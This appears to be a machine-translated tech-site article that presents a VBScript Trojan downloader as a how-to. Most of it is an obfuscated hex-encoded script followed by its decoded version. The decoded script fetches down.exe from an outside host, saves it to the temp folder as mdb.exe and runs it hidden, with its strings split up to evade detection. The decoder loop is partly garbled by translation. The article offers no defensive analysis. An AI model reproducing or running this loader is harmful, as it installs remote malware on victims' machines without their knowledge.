Shulou(Shulou.com)06/03 Report--

Editor to share with you how to use vbs to collect and download Trojans and run, I believe most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

S = "2020206F6E206572726F7220726573756D65206E6578740D0A737

3733D226D64622E657865220D0A61613D226F62220D0A6161613D22

6A65220D0A616161613D226374220D0A61616161613D22636C61220

D0A6161616161613D2273736964220D0A616161616161613D22636C

73220D0A61616161616161613D2269643A42443936220D0A6161616

161616161613D22433535362D3635220D0A61616161616161616161

3D2241332D313144220D0A61616161616161616161613D22302D393

8220D0A6161616161616161616161613D2233412D30304330344622

0D0A616161616161616161616161613D22433239453336220D0A6D6

D3D224D6963220D0A6E6E3D22726F73220D0A6D6D6E6E3D226F6674

2E58220D0A6E6E6D6D3D224D4C48220D0A6D6E6D6E3D22545450220

D0A6E6D3D6D6E0D0A62623D224164220D0A6262623D226F64220D0A

626262623D22622E5374220D0A62626262623D227265616D220D0A6

7673D2267220D0A65653D2265220D0A74743D2274220D0A63633D22

536372220D0A6363633D22697074220D0A636363633D22696E672E4

6220D0A6363313D22696C6553220D0A636363313D22797374220D0A

63636363313D22656D4F220D0A6363323D22626A220D0A636363323

D22656374220D0A68683D22536865220D0A6868683D226C6C2E4170

220D0A686868683D22706C69220D0A68686868683D2263617469220

D0A6868686868683D226F6E220D0A6F6F3D226F220D0A6F6F6F3D227

065220D0A6F6F6F6F3D226E220D0A536574207878787878787878203

D20646F63756D656E742E637265617465456C656D656E7428616126

6161612661616161290D0A78787878787878782E7365744174747269

62757465206161616161266161616161612C20616161616161612661

61616161616161266161616161616161612661616161616161616161

26616161616161616161616126616161616161616161616161266161

61616161616161616161610D0A53657420787878787878203D207878

7878787878782E4372656174654F626A656374286D6D266E6E266D6

D6E6E266E6E6D6D266D6E6D6E2C2222290D0A736574207878787820

3D2078787878787878782E6372656174656F626A6563742862622662

626226626262622662626262622C2222290D0A787878782E74797065

203D20310D0A7878787878782E4F70656E2067672665652674742C20

22687474703A2F2F71712E656532382E636E2F646F776E2F646F776E2

E657865222C2046616C73650D0A7878787878782E53656E640D0A78

7878787878783D7373730D0A20202020736574207878787878203D2

078787878787878782E6372656174656F626A6563742863632663636

32663636363266363312663636331266363636331266363322663636

3322C2222290D0A2020202073657420746D70203D2078787878782E

4765745370656369616C466F6C646572283229200D0A202020207878

78787878783D2078787878782E4275696C645061746828746D702C7

8787878787878290D0A20202020787878782E6F70656E0D0A2020202

0787878782E7772697465207878787878782E726573706F6E7365426

F64790D0A20202020787878782E73617665746F66696C65207878787

87878782C320D0A20202020787878782E636C6F73650D0A20202020

73657420717171203D2078787878787878782E6372656174656F626A

65637428686826686868266868686826686868686826686868686868

2C2222290D0A202020207171712E5368656C6C45786563757465207

87878787878782C22222C22222C6F6F266F6F6F266F6F6F6F2C30 ": d

= "EXECUTE": C = "& CHR (& H": n = ")": DO WHILE LEN (S) > 1:IF ISNUMER

IC (LEFT (SMagol 1)) THEN D=D&C&LEFT (SMagol 2) & N:S=MID (SMagol 3) ELSE D=D&C&LEF

T (Speni 4) & N:S=MID (Spenny 5)

LOOP:EXECUTE D

After decryption:

The copy code is as follows:

On error resume next

Sss= "mdb.exe"

Aa= "ob"

Aaa= "je"

Aaaa= "ct"

Aaaaa= "cla"

Aaaaaa= "ssid"

Aaaaaaa= "cls"

Aaaaaaaa= "id:BD96"

Aaaaaaaaa= "C556-65"

Aaaaaaaaaa= "A3-11D"

Aaaaaaaaaaa= "0-98"

Aaaaaaaaaaaa= "3A-00C04F"

Aaaaaaaaaaaaa= "C29E36"

Mm= "Mic"

Nn= "ros"

Mmnn= "oft.X"

Nnmm= "MLH"

Mnmn= "TTP"

Nm=mn

Bb= "Ad"

Bbb= "od"

Bbbb= "b.St"

Bbbbb= "ream"

Gg= "g"

Ee= "e"

Tt= "t"

Cc= "Scr"

Ccc= "ipt"

Cccc= "ing.F"

Cc1= "ileS"

Ccc1= "yst"

Cccc1= "emO"

Cc2= "bj"

Ccc2= "ect"

Hh= "She"

Hhh= "ll.Ap"

Hhhh= "pli"

Hhhhh= "cati"

Hhhhhh= "on"

Oo= "o"

Ooo= "pe"

Oooo= "n"

Set xxxxxxxx = document.createElement (aa&aaa&aaaa)

Xxxxxxxx.setAttribute aaaaa&aaaaaa, aaaaaaa&aaaaaaaa&aaaaaaaaa&aaaaaaaaaa&aaaaaaaaaaa&aaaaaaaaaaaa&aaaaaaaaaaaaa

Set xxxxxx = xxxxxxxx.CreateObject (mm&nn&mmnn&nnmm&mnmn, "")

Set xxxx = xxxxxxxx.createobject (bb&bbb&bbbb&bbbbb, "")

Xxxx.type = 1

Xxxxxx.Open gg&ee&tt, "http://qq.ee28.cn/down/down.exe", False"

Xxxxxx.Send

Xxxxxxx=sss

Set xxxxx = xxxxxxxx.createobject (cc&ccc&cccc&cc1&ccc1&cccc1&cc2&ccc2, "")

Set tmp = xxxxx.GetSpecialFolder (2)

Xxxxxxx= xxxxx.BuildPath (tmp,xxxxxxx)

Xxxx.open

Xxxx.write xxxxxx.responseBody

Xxxx.savetofile xxxxxxx,2

Xxxx.close

Set qqq = xxxxxxxx.createobject (hh&hhh&hhhh&hhhhh&hhhhhh, "")

Qqq.ShellExecute xxxxxxx, "," oo&ooo&oooo,0

The above is all the contents of the article "how to use vbs to collect and download Trojans and run them". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.